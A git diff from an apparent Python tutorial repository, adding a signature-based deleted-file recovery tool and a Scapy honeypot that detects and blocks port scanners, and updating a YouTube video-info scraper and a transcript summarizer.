+ self.logger.info(f"Limiting scan to first {self._format_size(self.max_scan_size)} of device")
+ device_size = self.max_scan_size
+
+ # Create subdirectories for each file type
+ for file_type in self.file_types:
+ (self.output_dir / file_type).mkdir(exist_ok=True)
+
+ scan_start_time = time.time()
+ last_progress_time = scan_start_time
+
+ # Read the device in blocks
+ while position < device_size:
+ # Check if timeout reached
+ if self.timeout_reached:
+ self.logger.warning("Stopping scan due to timeout")
+ break
+
+ try:
+ # Seek to position first
+ device.seek(position)
+
+ # Read a block of data
+ data = device.read(self.block_size)
+ if not data:
+ break
+
+ self.stats['bytes_scanned'] += len(data)
+
+ # Check for file signatures in this block
+ for file_type in self.file_types:
+ signatures = FILE_SIGNATURES.get(file_type, [])
+
+ for signature in signatures:
+ sig_pos = data.find(signature)
+
+ if sig_pos != -1:
+ # Found a file signature, try to recover the file
+ absolute_pos = position + sig_pos
+ device.seek(absolute_pos)
+
+ self.logger.debug(f"Found {file_type} signature at position {absolute_pos}")
+
+ # Recover the file
+ if self._recover_file(device, file_type, absolute_pos):
+ self.stats['total_files_recovered'] += 1
+ self.stats['recovered_by_type'][file_type] += 1
+ else:
+ self.stats['false_positives'] += 1
+
+ # Reset position to continue scanning
+ device.seek(position + self.block_size)
+
+ # Update position and show progress
+ position += self.block_size
+ current_time = time.time()
+
+ # Show progress every 5MB or 10 seconds, whichever comes first
+ if (position % (5 * 1024 * 1024) == 0) or (current_time - last_progress_time >= 10):
+ percent = (position / device_size) * 100 if device_size > 0 else 0
+ elapsed = current_time - self.stats['start_time']
+
+ # Calculate estimated time remaining
+ if position > 0 and device_size > 0:
+ bytes_per_second = position / elapsed if elapsed > 0 else 0
+ remaining_bytes = device_size - position
+ eta_seconds = remaining_bytes / bytes_per_second if bytes_per_second > 0 else 0
+ eta_str = str(timedelta(seconds=int(eta_seconds)))
+ else:
+ eta_str = "unknown"
+
+ self.logger.info(f"Progress: {percent:.2f}% ({self._format_size(position)} / {self._format_size(device_size)}) - "
+ f"{self.stats['total_files_recovered']} files recovered - "
+ f"Elapsed: {timedelta(seconds=int(elapsed))} - ETA: {eta_str}")
+ last_progress_time = current_time
+
+ except Exception as e:
+ self.logger.error(f"Error reading at position {position}: {e}")
+ position += self.block_size # Skip this block and continue
+
+ def _validate_file_content(self, data, file_type):
+ """
+ Additional validation to reduce false positives
+
+ Args:
+ data: File data to validate
+ file_type: Type of file to validate
+
+ Returns:
+ bool: True if file content appears valid
+ """
+ # Check minimum size
+ if len(data) < 100:
+ return False
+
+ # Check for validation patterns
+ patterns = VALIDATION_PATTERNS.get(file_type, [])
+ if patterns:
+ for pattern in patterns:
+ if pattern in data:
+ return True
+ return False # None of the patterns were found
+
+ # For file types without specific validation patterns
+ return True
+
+ def _recover_file(self, device, file_type, start_position):
+ """
+ Recover a file of the given type starting at the given position
+
+ Args:
+ device: Open file handle to the device
+ file_type: Type of file to recover
+ start_position: Starting position of the file
+
+ Returns:
+ bool: True if file was recovered successfully
+ """
+ max_size = MAX_FILE_SIZES.get(file_type, 10 * 1024 * 1024) # Default to 10MB
+ trailer = FILE_TRAILERS.get(file_type)
+
+ # Generate a unique filename
+ filename = f"{file_type}_{start_position}_{int(time.time())}_{binascii.hexlify(os.urandom(4)).decode()}.{file_type}"
+ output_path = self.output_dir / file_type / filename
+
+ if self.skip_existing and output_path.exists():
+ self.logger.debug(f"Skipping existing file: {output_path}")
+ return False
+
+ # Save the current position to restore later
+ current_pos = device.tell()
+
+ try:
+ # Seek to the start of the file
+ device.seek(start_position)
+
+ # Read the file data
+ if trailer and self.deep_scan:
+ # If we know the trailer and deep scan is enabled, read until trailer
+ file_data = self._read_until_trailer(device, trailer, max_size)
+ else:
+ # Otherwise, use heuristics to determine file size
+ file_data = self._read_file_heuristic(device, file_type, max_size)
+
+ if not file_data or len(file_data) < 100: # Ignore very small files
+ return False
+
+ # Additional validation to reduce false positives
+ if not self._validate_file_content(file_data, file_type):
+ self.logger.debug(f"Skipping invalid {file_type} file at position {start_position}")
+ return False
+
+ # Write the recovered file
+ with open(output_path, 'wb') as f:
+ f.write(file_data)
+
+ self.logger.info(f"Recovered {file_type} file: {filename} ({self._format_size(len(file_data))})")
+ return True
+
+ except Exception as e:
+ self.logger.error(f"Error recovering file at position {start_position}: {e}")
+ return False
+ finally:
+ # Restore the original position
+ try:
+ device.seek(current_pos)
+ except:
+ pass # Ignore seek errors in finally block
+
+ def _read_until_trailer(self, device, trailer, max_size):
+ """Read data until a trailer signature is found or max size is reached"""
+ buffer = bytearray()
+ chunk_size = 4096
+
+ while len(buffer) < max_size:
+ try:
+ chunk = device.read(chunk_size)
+ if not chunk:
+ break
+
+ buffer.extend(chunk)
+
+ # Check if trailer is in the buffer
+ trailer_pos = buffer.find(trailer, max(0, len(buffer) - len(trailer) - chunk_size))
+ if trailer_pos != -1:
+ # Found trailer, return data up to and including the trailer
+ return buffer[:trailer_pos + len(trailer)]
+ except Exception as e:
+ self.logger.error(f"Error reading chunk: {e}")
+ break
+
+ # If we reached max size without finding a trailer, return what we have
+ return buffer if len(buffer) > 100 else None
+
+ def _read_file_heuristic(self, device, file_type, max_size):
+ """
+ Use heuristics to determine file size when trailer is unknown
+ This is a simplified approach - real tools use more sophisticated methods
+ """
+ buffer = bytearray()
+ chunk_size = 4096
+ valid_chunks = 0
+ invalid_chunks = 0
+
+ # For Office documents and ZIP files, read a larger initial chunk to validate
+ initial_chunk_size = 16384 if file_type in ['docx', 'xlsx', 'pptx', 'zip'] else chunk_size
+
+ # Read initial chunk for validation
+ initial_chunk = device.read(initial_chunk_size)
+ if not initial_chunk:
+ return None
+
+ buffer.extend(initial_chunk)
+
+ # For Office documents, check if it contains required elements
+ if file_type in ['docx', 'xlsx', 'pptx', 'zip']:
+ # Basic validation for Office Open XML files
+ if file_type == 'docx' and b'word/' not in initial_chunk:
+ return None
+ if file_type == 'xlsx' and b'xl/' not in initial_chunk:
+ return None
+ if file_type == 'pptx' and b'ppt/' not in initial_chunk:
+ return None
+ if file_type == 'zip' and b'PK\x01\x02' not in initial_chunk:
+ return None
+
+ # Continue reading chunks
+ while len(buffer) < max_size:
+ try:
+ chunk = device.read(chunk_size)
+ if not chunk:
+ break
+
+ buffer.extend(chunk)
+
+ # Simple heuristic: for binary files, check if chunk contains too many non-printable characters
+ # This is a very basic approach and would need to be refined for real-world use
+ if file_type in ['jpg', 'png', 'gif', 'pdf', 'zip', 'docx', 'xlsx', 'pptx', 'mp3', 'mp4', 'avi']:
+ # For binary files, we continue reading until we hit max size or end of device
+ valid_chunks += 1
+
+ # For ZIP-based formats, check for corruption
+ if file_type in ['zip', 'docx', 'xlsx', 'pptx'] and b'PK' not in chunk and valid_chunks > 10:
+ # If we've read several chunks and don't see any more PK signatures, we might be past the file
+ invalid_chunks += 1
+
+ else:
+ # For text files, we could check for text validity
+ printable_ratio = sum(32 <= b <= 126 or b in (9, 10, 13) for b in chunk) / len(chunk)
+ if printable_ratio < 0.7: # If less than 70% printable characters
+ invalid_chunks += 1
+ else:
+ valid_chunks += 1
+
+ # If we have too many invalid chunks in a row, stop
+ if invalid_chunks > 3:
+ return buffer[:len(buffer) - (invalid_chunks * chunk_size)]
+ except Exception as e:
+ self.logger.error(f"Error reading chunk in heuristic: {e}")
+ break
+
+ return buffer
+
+ def _format_size(self, size_bytes):
+ """Format size in bytes to a human-readable string"""
+ for unit in ['B', 'KB', 'MB', 'GB', 'TB']:
+ if size_bytes < 1024 or unit == 'TB':
+ return f"{size_bytes:.2f} {unit}"
+ size_bytes /= 1024
+
+ def _print_summary(self):
+ """Print a summary of the recovery operation"""
+ elapsed = time.time() - self.stats['start_time']
+
+ self.logger.info("=" * 50)
+ self.logger.info("Recovery Summary")
+ self.logger.info("=" * 50)
+ self.logger.info(f"Total files recovered: {self.stats['total_files_recovered']}")
+ self.logger.info(f"False positives detected and skipped: {self.stats['false_positives']}")
+ self.logger.info(f"Total data scanned: {self._format_size(self.stats['bytes_scanned'])}")
+ self.logger.info(f"Time elapsed: {timedelta(seconds=int(elapsed))}")
+ self.logger.info("Files recovered by type:")
+
+ for file_type, count in self.stats['recovered_by_type'].items():
+ if count > 0:
+ self.logger.info(f" - {file_type}: {count}")
+
+ if self.timeout_reached:
+ self.logger.info("Note: Scan was stopped due to timeout")
+
+ self.logger.info("=" * 50)
+
+
+def main():
+ """Main function to parse arguments and run the recovery tool"""
+ parser = argparse.ArgumentParser(description='File Recovery Tool - Recover deleted files from storage devices')
+
+ parser.add_argument('source', help='Source device or directory to recover files from (e.g., /dev/sdb, /media/usb)')
+ parser.add_argument('output', help='Directory to save recovered files')
+
+ parser.add_argument('-t', '--types', nargs='+', choices=FILE_SIGNATURES.keys(), default=None,
+ help='File types to recover (default: all supported types)')
+
+ parser.add_argument('-d', '--deep-scan', action='store_true',
+ help='Perform a deep scan (slower but more thorough)')
+
+ parser.add_argument('-b', '--block-size', type=int, default=512,
+ help='Block size for reading data (default: 512 bytes)')
+
+ parser.add_argument('-v', '--verbose', action='store_true',
+ help='Enable verbose output')
+
+ parser.add_argument('-q', '--quiet', action='store_true',
+ help='Suppress all output except errors')
+
+ parser.add_argument('--no-skip', action='store_true',
+ help='Do not skip existing files in output directory')
+
+ parser.add_argument('--max-size', type=int,
+ help='Maximum size to scan in MB (e.g., 1024 for 1GB)')
+
+ parser.add_argument('--timeout', type=int, default=None,
+ help='Stop scanning after specified minutes')
+
+ args = parser.parse_args()
+
+ # Set logging level based on verbosity
+ if args.quiet:
+ log_level = logging.ERROR
+ elif args.verbose:
+ log_level = logging.DEBUG
+ else:
+ log_level = logging.INFO
+
+ # Convert max size from MB to bytes if specified
+ max_scan_size = args.max_size * 1024 * 1024 if args.max_size else None
+
+ # Create and run the recovery tool
+ recovery_tool = FileRecoveryTool(
+ source=args.source,
+ output_dir=args.output,
+ file_types=args.types,
+ deep_scan=args.deep_scan,
+ block_size=args.block_size,
+ log_level=log_level,
+ skip_existing=not args.no_skip,
+ max_scan_size=max_scan_size,
+ timeout_minutes=args.timeout
+ )
+
+ try:
+ recovery_tool.scan_device()
+ except KeyboardInterrupt:
+ print("\nRecovery process interrupted by user.")
+ recovery_tool._print_summary()
+ sys.exit(1)
+
+
+if __name__ == "__main__":
+ main()
diff --git a/scapy/honeypot-defense-system/README.md b/scapy/honeypot-defense-system/README.md
new file mode 100644
index 00000000..82c72f3b
--- /dev/null
+++ b/scapy/honeypot-defense-system/README.md
@@ -0,0 +1,4 @@
+# [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system)
+Requires Linux or Windows with WSL, Python 3.8+, and Scapy. Install Scapy using `pip install scapy` or refer to the [Scapy installation guide](https://scapy.readthedocs.io/en/latest/installation.html) for detailed instructions.
+
+Read the full article on [ThePythonCode](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system) for a step-by-step tutorial on building a honeypot defense system using Python and Scapy.
\ No newline at end of file
diff --git a/scapy/honeypot-defense-system/block_port_scan.py b/scapy/honeypot-defense-system/block_port_scan.py
new file mode 100644
index 00000000..43c23e61
--- /dev/null
+++ b/scapy/honeypot-defense-system/block_port_scan.py
@@ -0,0 +1,230 @@
+#!/usr/bin/env python3
+"""
+Honeypot Defense System
+Detects port scanners using decoy ports and blocks malicious IPs
+"""
+
+from scapy.all import *
+from datetime import datetime
+import sys
+
+# ==================== NETWORK INTERFACE ====================
+conf.iface = "enp0s8" # Specify your network interface
+
+# ==================== CONFIGURATION ====================
+DEFENDER_IP = "192.168.56.101" # Change this to your Ubuntu IP
+
+# Three-tier port system
+PUBLIC_PORTS = [80] # Open to everyone (realistic services)
+HONEYPOT_PORTS = [8080, 8443, 3389, 3306] # Decoy ports to trap attackers
+PROTECTED_PORTS = [443, 53, 22, 5432] # Hidden unless IP is allowed
+
+ALLOWED_IPS = [
+ "192.168.1.100", # Add your Kali IP here
+ "192.168.1.1", # Add other trusted IPs
+]
+MAX_ATTEMPTS = 3 # Block after this many honeypot accesses (changeable)
+LOG_FILE = "honeypot_logs.txt"
+
+# ==================== GLOBALS ====================
+blocked_ips = []
+attempt_tracker = {} # {IP: attempt_count}
+total_scans = 0
+total_blocks = 0
+
+# ==================== HELPER FUNCTIONS ====================
+
+def log_message(message, color_code=None):
+ """Print and save log messages with timestamps"""
+ timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+ log_entry = f"[{timestamp}] {message}"
+
+ # Color output for terminal
+ if color_code:
+ print(f"\033[{color_code}m{log_entry}\033[0m")
+ else:
+ print(log_entry)
+
+ # Save to file
+ with open(LOG_FILE, "a") as f:
+ f.write(log_entry + "\n")
+
+
+def is_allowed_ip(ip):
+ """Check if IP is in the allowlist"""
+ return ip in ALLOWED_IPS
+
+
+def track_attempt(ip):
+ """Track honeypot access attempts and return current count"""
+ if ip not in attempt_tracker:
+ attempt_tracker[ip] = 0
+ attempt_tracker[ip] += 1
+ return attempt_tracker[ip]
+
+
+def block_ip(ip):
+ """Add IP to blocklist"""
+ global total_blocks
+ if ip not in blocked_ips:
+ blocked_ips.append(ip)
+ total_blocks += 1
+ log_message(f"[!] IP BLOCKED: {ip}", "91") # Red
+
+
+def create_response(packet, flags):
+ """Create a TCP response packet"""
+ if packet.haslayer(IP):
+ response = (
+ Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+ IP(src=packet[IP].dst, dst=packet[IP].src) /
+ TCP(
+ sport=packet[TCP].dport,
+ dport=packet[TCP].sport,
+ flags=flags,
+ seq=0,
+ ack=packet[TCP].seq + 1
+ )
+ )
+ else: # IPv6
+ response = (
+ Ether(src=packet[Ether].dst, dst=packet[Ether].src) /
+ IPv6(src=packet[IPv6].dst, dst=packet[IPv6].src) /
+ TCP(
+ sport=packet[TCP].dport,
+ dport=packet[TCP].sport,
+ flags=flags,
+ seq=0,
+ ack=packet[TCP].seq + 1
+ )
+ )
+ return response
+
+
+# ==================== MAIN PACKET HANDLER ====================
+
+def handle_packet(packet):
+ """Process incoming TCP packets with three-tier security"""
+ global total_scans
+
+ # Only process SYN packets (connection attempts)
+ if packet[TCP].flags != "S":
+ return
+
+ # Extract source IP and destination port
+ if packet.haslayer(IP):
+ source_ip = packet[IP].src
+ else:
+ source_ip = packet[IPv6].src
+
+ dest_port = packet[TCP].dport
+ total_scans += 1
+
+ # ===== CHECK IF IP IS BLOCKED FIRST =====
+ if source_ip in blocked_ips:
+ # Drop packet silently - no response to show as "filtered" in nmap
+ log_message(f"[-] Blocked IP {source_ip} denied access to port {dest_port}", "90")
+ return # Don't send any response - this makes it appear "filtered"
+
+ # ===== PUBLIC PORTS (open to everyone) =====
+ if dest_port in PUBLIC_PORTS:
+ # Let the real service handle it - no response needed from script
+ log_message(f"[+] Public port {dest_port} accessed by {source_ip}", "94") # Blue
+ return
+
+ # ===== HONEYPOT PORTS (trap for attackers) =====
+ if dest_port in HONEYPOT_PORTS:
+ # Always respond with SYN-ACK to appear "open"
+ response = create_response(packet, "SA")
+ sendp(response, verbose=False)
+
+ # Check if IP is allowed
+ if is_allowed_ip(source_ip):
+ log_message(
+ f"[+] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+ f"[!] Status: TRUSTED IP (allowed)",
+ "92" # Green
+ )
+ else:
+ # Track attempts for unknown IPs
+ attempts = track_attempt(source_ip)
+ log_message(
+ f"[!] HONEYPOT ACCESS from {source_ip}:{dest_port}\n"
+ f"[-] Status: UNKNOWN IP - POTENTIAL ATTACKER\n"
+ f"[!] Strike {attempts}/{MAX_ATTEMPTS}",
+ "93" # Yellow
+ )
+
+ # Block after max attempts
+ if attempts >= MAX_ATTEMPTS:
+ block_ip(source_ip)
+ return
+
+ # ===== PROTECTED PORTS (only allowed IPs) =====
+ if dest_port in PROTECTED_PORTS:
+ if is_allowed_ip(source_ip):
+ # Respond with SYN-ACK for allowed IPs
+ response = create_response(packet, "SA")
+ sendp(response, verbose=False)
+ log_message(f"[!] Protected port {dest_port} accessed by TRUSTED IP {source_ip}", "92")
+ else:
+ # Drop packet silently for unknown IPs (appears filtered)
+ log_message(f"[!] Protected port {dest_port} hidden from {source_ip}", "93")
+ return
+
+ # ===== OTHER PORTS (default behavior - drop silently) =====
+ # Unknown ports are silently dropped (appear filtered)
+
+
+# ==================== STARTUP & MAIN ====================
+
+def print_banner():
+ """Display startup information"""
+ print("\n" + "="*60)
+ print("[+] HONEYPOT DEFENSE SYSTEM ACTIVE")
+ print("="*60)
+ print(f"Defending IP: {DEFENDER_IP}")
+ print(f"Public Ports (open to all): {PUBLIC_PORTS}")
+ print(f"Honeypot Ports (trap): {HONEYPOT_PORTS}")
+ print(f"Protected Ports (allowed IPs only): {PROTECTED_PORTS}")
+ print(f"Allowed IPs: {ALLOWED_IPS}")
+ print(f"Block Threshold: {MAX_ATTEMPTS} attempts")
+ print(f"Log File: {LOG_FILE}")
+ print("="*60)
+ print("Monitoring traffic... Press Ctrl+C to stop\n")
+
+
+def print_summary():
+ """Display statistics on exit"""
+ print("\n" + "="*60)
+ print("[+] SESSION SUMMARY")
+ print("="*60)
+ print(f"Total scans detected: {total_scans}")
+ print(f"IPs blocked: {total_blocks}")
+ print(f"Current blocklist: {blocked_ips if blocked_ips else 'None'}")
+ print("="*60 + "\n")
+
+
+def main():
+ """Main execution"""
+ print_banner()
+
+ # Create BPF filter
+ packet_filter = f"dst host {DEFENDER_IP} and tcp"
+
+ try:
+ # Start sniffing
+ sniff(filter=packet_filter, prn=handle_packet, store=False)
+ except KeyboardInterrupt:
+ print("\n\n[!] Stopping honeypot defense...")
+ print_summary()
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ # Check for root privileges
+ if os.geteuid() != 0:
+ print("[!] This script requires root privileges. Run with: sudo python3 honeypot_defender.py")
+ sys.exit(1)
+
+ main()
diff --git a/scapy/honeypot-defense-system/requirements.txt b/scapy/honeypot-defense-system/requirements.txt
new file mode 100644
index 00000000..93b351f4
--- /dev/null
+++ b/scapy/honeypot-defense-system/requirements.txt
@@ -0,0 +1 @@
+scapy
\ No newline at end of file
diff --git a/web-scraping/youtube-extractor/extract_video_info.py b/web-scraping/youtube-extractor/extract_video_info.py
index 042ce4f8..bed184b0 100644
--- a/web-scraping/youtube-extractor/extract_video_info.py
+++ b/web-scraping/youtube-extractor/extract_video_info.py
@@ -1,92 +1,150 @@
-from requests_html import HTMLSession
-from bs4 import BeautifulSoup as bs
+import requests
+from bs4 import BeautifulSoup
import re
import json
-
-# init session
-session = HTMLSession()
-
+import argparse
def get_video_info(url):
- # download HTML code
- response = session.get(url)
- # execute Javascript
- response.html.render(timeout=60)
- # create beautiful soup object to parse HTML
- soup = bs(response.html.html, "html.parser")
- # open("index.html", "w").write(response.html.html)
- # initialize the result
- result = {}
- # video title
- result["title"] = soup.find("meta", itemprop="name")['content']
- # video views
- result["views"] = soup.find("meta", itemprop="interactionCount")['content']
- # video description
- result["description"] = soup.find("meta", itemprop="description")['content']
- # date published
- result["date_published"] = soup.find("meta", itemprop="datePublished")['content']
- # get the duration of the video
- result["duration"] = soup.find("span", {"class": "ytp-time-duration"}).text
- # get the video tags
- result["tags"] = ', '.join([ meta.attrs.get("content") for meta in soup.find_all("meta", {"property": "og:video:tag"}) ])
-
- # Additional video and channel information (with help from: https://stackoverflow.com/a/68262735)
- data = re.search(r"var ytInitialData = ({.*?});", soup.prettify()).group(1)
- data_json = json.loads(data)
- videoPrimaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][0]['videoPrimaryInfoRenderer']
- videoSecondaryInfoRenderer = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents'][1]['videoSecondaryInfoRenderer']
- # number of likes
- likes_label = videoPrimaryInfoRenderer['videoActions']['menuRenderer']['topLevelButtons'][0]['toggleButtonRenderer']['defaultText']['accessibility']['accessibilityData']['label'] # "No likes" or "###,### likes"
- likes_str = likes_label.split(' ')[0].replace(',','')
- result["likes"] = '0' if likes_str == 'No' else likes_str
- # number of likes (old way) doesn't always work
- # text_yt_formatted_strings = soup.find_all("yt-formatted-string", {"id": "text", "class": "ytd-toggle-button-renderer"})
- # result["likes"] = ''.join([ c for c in text_yt_formatted_strings[0].attrs.get("aria-label") if c.isdigit() ])
- # result["likes"] = 0 if result['likes'] == '' else int(result['likes'])
- # number of dislikes - YouTube does not publish this anymore...
- # result["dislikes"] = ''.join([ c for c in text_yt_formatted_strings[1].attrs.get("aria-label") if c.isdigit() ])
- # result["dislikes"] = '0' if result['dislikes'] == '' else result['dislikes']
- result['dislikes'] = 'UNKNOWN'
- # channel details
- channel_tag = soup.find("meta", itemprop="channelId")['content']
- # channel name
- channel_name = soup.find("span", itemprop="author").next.next['content']
- # channel URL
- # channel_url = soup.find("span", itemprop="author").next['href']
- channel_url = f"https://www.youtube.com/{channel_tag}"
- # number of subscribers as str
- channel_subscribers = videoSecondaryInfoRenderer['owner']['videoOwnerRenderer']['subscriberCountText']['accessibility']['accessibilityData']['label']
- # channel details (old way)
- # channel_tag = soup.find("yt-formatted-string", {"class": "ytd-channel-name"}).find("a")
- # # channel name (old way)
- # channel_name = channel_tag.text
- # # channel URL (old way)
- # channel_url = f"https://www.youtube.com{channel_tag['href']}"
- # number of subscribers as str (old way)
- # channel_subscribers = soup.find("yt-formatted-string", {"id": "owner-sub-count"}).text.strip()
- result['channel'] = {'name': channel_name, 'url': channel_url, 'subscribers': channel_subscribers}
- return result
+ """
+ Extract video information from YouTube using modern approach
+ """
+ headers = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
+ }
+
+ try:
+ # Download HTML code
+ response = requests.get(url, headers=headers)
+ response.raise_for_status()
+
+ # Create beautiful soup object to parse HTML
+ soup = BeautifulSoup(response.text, "html.parser")
+
+ # Initialize the result
+ result = {}
+
+ # Extract ytInitialData which contains all the video information
+ data_match = re.search(r'var ytInitialData = ({.*?});', response.text)
+ if not data_match:
+ raise Exception("Could not find ytInitialData in page")
+
+ data_json = json.loads(data_match.group(1))
+
+ # Get the main content sections
+ contents = data_json['contents']['twoColumnWatchNextResults']['results']['results']['contents']
+
+ # Extract video information from videoPrimaryInfoRenderer
+ if 'videoPrimaryInfoRenderer' in contents[0]:
+ primary = contents[0]['videoPrimaryInfoRenderer']
+
+ # Video title
+ result["title"] = primary['title']['runs'][0]['text']
+
+ # Video views
+ result["views"] = primary['viewCount']['videoViewCountRenderer']['viewCount']['simpleText']
+
+ # Date published
+ result["date_published"] = primary['dateText']['simpleText']
+
+ # Extract channel information from videoSecondaryInfoRenderer
+ secondary = None
+ if 'videoSecondaryInfoRenderer' in contents[1]:
+ secondary = contents[1]['videoSecondaryInfoRenderer']
+ owner = secondary['owner']['videoOwnerRenderer']
+
+ # Channel name
+ channel_name = owner['title']['runs'][0]['text']
+
+ # Channel ID
+ channel_id = owner['navigationEndpoint']['browseEndpoint']['browseId']
+
+ # Channel URL - FIXED with proper /channel/ path
+ channel_url = f"https://www.youtube.com/channel/{channel_id}"
+
+ # Number of subscribers
+ channel_subscribers = owner['subscriberCountText']['accessibility']['accessibilityData']['label']
+
+ result['channel'] = {
+ 'name': channel_name,
+ 'url': channel_url,
+ 'subscribers': channel_subscribers
+ }
+
+ # Extract video description
+ if secondary and 'attributedDescription' in secondary:
+ description_runs = secondary['attributedDescription']['content']
+ result["description"] = description_runs
+ else:
+ result["description"] = "Description not available"
+
+ # Try to extract video duration from player overlay
+ # This is a fallback approach since the original method doesn't work
+ duration_match = re.search(r'"approxDurationMs":"(\d+)"', response.text)
+ if duration_match:
+ duration_ms = int(duration_match.group(1))
+ minutes = duration_ms // 60000
+ seconds = (duration_ms % 60000) // 1000
+ result["duration"] = f"{minutes}:{seconds:02d}"
+ else:
+ result["duration"] = "Duration not available"
+
+ # Extract video tags if available
+ video_tags = []
+ if 'keywords' in data_json.get('metadata', {}).get('videoMetadataRenderer', {}):
+ video_tags = data_json['metadata']['videoMetadataRenderer']['keywords']
+ result["tags"] = ', '.join(video_tags) if video_tags else "No tags available"
+
+ # Extract likes (modern approach)
+ result["likes"] = "Likes count not available"
+ result["dislikes"] = "UNKNOWN" # YouTube no longer shows dislikes
+
+ # Try to find likes in the new structure
+ for content in contents:
+ if 'compositeVideoPrimaryInfoRenderer' in content:
+ composite = content['compositeVideoPrimaryInfoRenderer']
+ if 'likeButton' in composite:
+ like_button = composite['likeButton']
+ if 'toggleButtonRenderer' in like_button:
+ toggle = like_button['toggleButtonRenderer']
+ if 'defaultText' in toggle:
+ default_text = toggle['defaultText']
+ if 'accessibility' in default_text:
+ accessibility = default_text['accessibility']
+ if 'accessibilityData' in accessibility:
+ label = accessibility['accessibilityData']['label']
+ if 'like' in label.lower():
+ result["likes"] = label
+
+ return result
+
+ except Exception as e:
+ raise Exception(f"Error extracting video info: {str(e)}")
if __name__ == "__main__":
- import argparse
parser = argparse.ArgumentParser(description="YouTube Video Data Extractor")
parser.add_argument("url", help="URL of the YouTube video")
args = parser.parse_args()
+
# parse the video URL from command line
url = args.url
- data = get_video_info(url)
+ try:
+ data = get_video_info(url)
- # print in nice format
- print(f"Title: {data['title']}")
- print(f"Views: {data['views']}")
- print(f"Published at: {data['date_published']}")
- print(f"Video Duration: {data['duration']}")
- print(f"Video tags: {data['tags']}")
- print(f"Likes: {data['likes']}")
- print(f"Dislikes: {data['dislikes']}")
- print(f"\nDescription: {data['description']}\n")
- print(f"\nChannel Name: {data['channel']['name']}")
- print(f"Channel URL: {data['channel']['url']}")
- print(f"Channel Subscribers: {data['channel']['subscribers']}")
+ # print in nice format
+ print(f"Title: {data['title']}")
+ print(f"Views: {data['views']}")
+ print(f"Published at: {data['date_published']}")
+ print(f"Video Duration: {data['duration']}")
+ print(f"Video tags: {data['tags']}")
+ print(f"Likes: {data['likes']}")
+ print(f"Dislikes: {data['dislikes']}")
+ print(f"\nDescription: {data['description']}\n")
+ print(f"\nChannel Name: {data['channel']['name']}")
+ print(f"Channel URL: {data['channel']['url']}")
+ print(f"Channel Subscribers: {data['channel']['subscribers']}")
+
+ except Exception as e:
+ print(f"Error: {e}")
+ print("\nNote: YouTube frequently changes its structure, so this script may need updates.")
\ No newline at end of file
diff --git a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
index 6d4983ef..bdb80f54 100644
--- a/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
+++ b/web-scraping/youtube-transcript-summarizer/youtube_transcript_summarizer.py
@@ -1,8 +1,7 @@
import os
-import re
+import sys
import nltk
import pytube
-import youtube_transcript_api
from youtube_transcript_api import YouTubeTranscriptApi
from nltk.corpus import stopwords
from nltk.tokenize import sent_tokenize, word_tokenize
@@ -21,11 +20,17 @@
nltk.download('punkt', quiet=True)
nltk.download('stopwords', quiet=True)
-# Initialize OpenAI client
-client = OpenAI(
- base_url="https://openrouter.ai/api/v1",
- api_key="", # Add your OpenRouter API key here
-)
+# Initialize OpenAI client from environment variable
+# Expect the OpenRouter API key to be provided via OPENROUTER_API_KEY
+api_key = os.getenv("OPENROUTER_API_KEY")
+if not api_key:
+ print(Fore.RED + "Error: OPENROUTER_API_KEY environment variable is not set or is still the placeholder ('').")
+ sys.exit(1)
+else:
+ client = OpenAI(
+ base_url="https://openrouter.ai/api/v1",
+ api_key=api_key,
+ )
def extract_video_id(youtube_url):
"""Extract the video ID from a YouTube URL."""
@@ -48,8 +53,10 @@ def extract_video_id(youtube_url):
def get_transcript(video_id):
"""Get the transcript of a YouTube video."""
try:
- transcript = YouTubeTranscriptApi.get_transcript(video_id)
- return ' '.join([entry['text'] for entry in transcript])
+ youtube_transcript_api = YouTubeTranscriptApi()
+ fetched_transcript = youtube_transcript_api.fetch(video_id)
+ full_transcript = " ".join([snippet.text for snippet in fetched_transcript.snippets])
+ return full_transcript.strip()
except Exception as e:
return f"Error retrieving transcript: {str(e)}."